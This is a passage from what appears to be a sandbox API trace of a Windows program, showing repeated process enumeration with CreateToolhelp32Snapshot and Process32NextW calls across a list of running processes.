th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0137.995] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0137.996] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0137.997] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0137.998] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0137.999] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0138.000] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0138.002] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0138.003] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0138.004] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0138.006] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0138.007] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0138.019] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0138.020] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.022] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0138.023] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0138.025] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0138.026] CloseHandle (hObject=0xbc) returned 1 [0138.026] Sleep (dwMilliseconds=0x12c) [0138.383] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0138.390] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0138.392] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0138.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0138.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0138.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0138.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0138.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0138.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0138.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0138.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0138.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0138.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0138.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0138.426] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0138.427] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0138.441] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.443] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0138.445] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0138.446] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0138.447] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0138.449] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0138.450] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0138.452] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0138.453] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0138.455] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0138.456] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0138.458] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0138.459] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0138.461] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0138.462] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0138.464] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0138.465] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0138.467] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0138.468] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0138.470] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0138.471] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0138.472] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0138.474] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.478] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0138.480] CloseHandle (hObject=0xc4) returned 1 [0138.480] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0138.486] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.487] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0138.488] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0138.489] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0138.490] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0138.491] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0138.492] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0138.492] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0138.493] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0138.494] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0138.495] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.496] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.496] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.497] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.498] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.499] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0138.500] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.501] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 